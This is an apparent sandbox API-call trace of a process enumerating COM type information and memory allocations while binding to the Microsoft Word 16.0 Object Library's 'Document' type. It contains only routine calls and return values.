ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb5af8, pDummy=0x33e4fb5ae0 | out: ppTypeAttr=0x33e4fb5af8, pDummy=0x33e4fb5ae0*=0x0) returned 0x0 [0060.208] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.208] IUnknown:Release (This=0x1d39d552b18) returned 0x2 [0060.208] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.208] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x118) returned 0x1d39d8fbe00 [0060.208] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8ae4b0 [0060.208] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xe30) returned 0x1d39db05780 [0060.208] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb5ad8, pDummy=0x33e4fb5b14 | out: ppTypeAttr=0x33e4fb5ad8, pDummy=0x33e4fb5b14*=0xffffffff) returned 0x0 [0060.208] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x0, ppFuncDesc=0x33e4fb5ad0, pDummy=0x1d38ee9d7a0 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x1d38ee9d7a0*=0x98ff3f0) returned 0x0 [0060.208] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.208] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x1, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.208] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x2, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x3, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x4, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x5, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x6, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x7, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x8, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x9, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xa, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xb, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xc, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb5ad8, pDummy=0x33e4fb5b14 | out: ppTypeAttr=0x33e4fb5ad8, pDummy=0x33e4fb5b14*=0xffffffff) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x0, ppFuncDesc=0x33e4fb5ad0, pDummy=0x1d38ee9d7a0 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x1d38ee9d7a0*=0x98ff3f0) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x1, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x2, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x3, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x4, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x5, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x6, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x7, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x8, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.209] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.210] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0x9, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.210] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.210] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xa, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.210] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.210] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xb, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.210] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.210] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552bc8, index=0xc, ppFuncDesc=0x33e4fb5ad0, pDummy=0x6 | out: ppFuncDesc=0x33e4fb5ad0, pDummy=0x6) returned 0x0 [0060.210] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552bc8) returned 0x0 [0060.210] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.210] IUnknown:Release (This=0x1d39d552bc8) returned 0x3 [0060.210] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39dbb2610 [0060.210] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39dbb2150 [0060.210] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39dbb20b0 [0060.210] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb53e8 | out: ppvObject=0x33e4fb53e8*=0x0) returned 0x80004002 [0060.210] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb53e0, pDummy=0x33e4fb53e8 | out: ppTypeAttr=0x33e4fb53e0, pDummy=0x33e4fb53e8*=0x0) returned 0x0 [0060.210] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5358 | out: ppvObject=0x33e4fb5358*=0x0) returned 0x80004002 [0060.210] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x4 [0060.210] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb5350, pDummy=0x33e4fb5358 | out: ppTypeAttr=0x33e4fb5350, pDummy=0x33e4fb5358*=0x0) returned 0x0 [0060.210] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.210] IUnknown:Release (This=0x1d39d552bc8) returned 0x3 [0060.210] strcpy_s (in: _Dst=0x1d39d8ae508, _DstSize=0x9, _Src="Document" | out: _Dst="Document") returned 0x0 [0060.210] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xc8) returned 0x1d39d7d3d30 [0060.210] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb5310, pDummy=0x1d39d552bc8 | out: ppTypeAttr=0x33e4fb5310, pDummy=0x1d39d552bc8*=0x961f308) returned 0x0 [0060.210] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d552bc8, ppTLib=0x33e4fb5318, pIndex=0x33e4fb5358 | out: ppTLib=0x33e4fb5318*=0x1d3985c4c00, pIndex=0x33e4fb5358*=0x20e) returned 0x0 [0060.211] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb5008, pDummy=0x0 | out: ppTLibAttr=0x33e4fb5008, pDummy=0x0) returned 0x0 [0060.211] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0xe4fb5020, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x33e4fb5090, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBß\ný\x7f", lpUsedDefaultChar=0x0) returned 58 [0060.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x33e4fb51a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0060.211] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0060.211] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39d5fb780 [0060.211] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b0f70 [0060.211] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x4 [0060.211] IUnknown:Release (This=0x1d3985c4c00) returned 0xc [0060.211] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.211] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.211] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.211] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x14) returned 0x1d39dbb2630 [0060.211] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.211] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39d5fbbd0 [0060.211] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb2630) [0060.212] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6bc8 | out: ppvObject=0x33e4fb6bc8*=0x1d39d552a68) returned 0x0 [0060.212] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb6bd8 | out: pVarVal=0x33e4fb6bd8*(varType=0x0, wReserved1=0xe4fb, wReserved2=0x33, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.212] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.212] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb6bd0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6bf0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6bf0*="") returned 0x0 [0060.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb6ae0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.212] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.212] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb6bd0, pDummy=0x0 | out: ppTypeAttr=0x33e4fb6bd0, pDummy=0x0) returned 0x0 [0060.212] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.212] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x10, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x11, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x12, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x13, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x14, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x15, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x16, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x17, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x18, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x19, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x20, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.213] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x21, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x22, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x23, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x24, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x25, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] 